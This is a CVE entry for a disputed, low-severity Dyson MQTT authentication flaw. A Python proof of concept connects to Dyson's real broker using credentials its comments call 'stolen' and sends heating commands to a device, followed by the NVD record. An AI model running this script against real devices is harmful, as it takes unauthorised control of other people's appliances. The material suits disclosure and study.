CVE-2025-56558

#!/usr/bin/env python3 """ CVE-2025-56558 PoC - Dyson MQTT Server Authentication Bypass Note: This is a conceptual PoC for educational purposes only. """ import paho.mqtt.client as mqtt import boto3 import json from datetime import datetime # Configuration DYSYON_MQTT_BROKER = "iot.dyson.com" MQTT_PORT = 8883 class DysonMQTTExploit: def __init__(self, aws_access_key, aws_secret_key, aws_session_token, device_serial): self.aws_access_key = aws_access_key self.aws_secret_key = aws_secret_key self.aws_session_token = aws_session_token self.device_serial = device_serial self.client = None def on_connect(self, client, userdata, flags, rc): if rc == 0: print(f"[+] Successfully connected to Dyson MQTT broker") # Subscribe to device status topic topic = f"\x00{self.device_serial}/status" client.subscribe(topic) print(f"[+] Subscribed to topic: {topic}") # Publish temperature control command self.set_temperature(25) else: print(f"[-] Connection failed with code: {rc}") def on_message(self, client, userdata, msg): print(f"[+] Received message on {msg.topic}: {msg.payload}") def set_temperature(self, temp_celsius): """Set the room temperature (0-37°C within safe range)""" if temp_celsius < 0 or temp_celsius > 37: print(f"[-] Temperature must be between 0-37°C") return # Construct MQTT command payload command_topic = f"\x00{self.device_serial}/command" payload = { "msg": "STATE-SET", "data": { "fmod": "heat", "tact": str(temp_celsius), "fnsp": "0101", "fpwr": "ON" }, "time": datetime.now().isoformat() } result = self.client.publish(command_topic, json.dumps(payload)) if result.rc == mqtt.MQTT_ERR_SUCCESS: print(f"[+] Temperature set to {temp_celsius}°C") else: print(f"[-] Failed to send command") def exploit(self): """Main exploit function""" print("[*] CVE-2025-56558 - Dyson MQTT Authentication Bypass") print(f"[*] Target device: {self.device_serial}") # Create MQTT client with TLS self.client = mqtt.Client(client_id=self.device_serial) self.client.tls_set_context(context=None) self.client.on_connect = self.on_connect self.client.on_message = self.on_message # Set credentials (AWS IoT Core authentication) self.client.username_pw_set( username=self.aws_access_key, password=self.aws_session_token ) try: self.client.connect(DYSYON_MQTT_BROKER, MQTT_PORT, 60) self.client.loop_forever() except Exception as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": # Replace with actual stolen credentials AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE" AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" AWS_SESSION_TOKEN = "FwoGZXIvYXdzECYaDPABCDEFexample" DEVICE_SERIAL = "XXX-XX-12345678" exploit = DysonMQTTExploit(AWS_ACCESS_KEY, AWS_SECRET_KEY, AWS_SESSION_TOKEN, DEVICE_SERIAL) exploit.exploit()

{"cve": {"id": "CVE-2025-56558", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:35.760", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed", "exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Dyson MQTT server (2022 and possibly later) allows publications and subscriptions by a client that has the correct values of AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, and device serial number, even if a device (such as a Pure Hot+Cool device) has been removed and is not visible in the supported MyDyson app. This could allow an unexpected actor to obtain control and set the room temperature (up to 37 Celsius) if ownership of the device is transferred without wiping the device. NOTE: the Supplier's position is that this is a potential vulnerability that dates back 4 years ago in 2022 and \"we are unable to replicate that anymore.\" Based on the submitted report, in order to leverage this issue, an attacker needs to own a Dyson device with full privileges, sniff for the AWS credentials, and then transfer ownership of that Dyson device to the victim. Even if these steps were successfully accomplished, the attacker only acquires the ability to configure the Dyson device within its safe operating range, and does not acquire the ability to execute code on the device or obtain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:N", "baseScore": 3.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-420"}]}], "references": [{"url": "https://archive.org/details/dyson-acpolicy-bug-report", "source": "[email protected]"}, {"url": "https://support.dyson.com.au/supporthome/Air-Treatment/Purifier/pure-hot-cool-link/385276-01/troubleshooting/machine-is-not-heating", "source": "[email protected]"}, {"url": "https://www.dyson.co.uk/support/reporting-data-security-issues", "source": "[email protected]"}, {"url": "https://www.dyson.com/air-treatment/air-purifier-heaters/pure-hot-cool-hp04", "source": "[email protected]"}]}}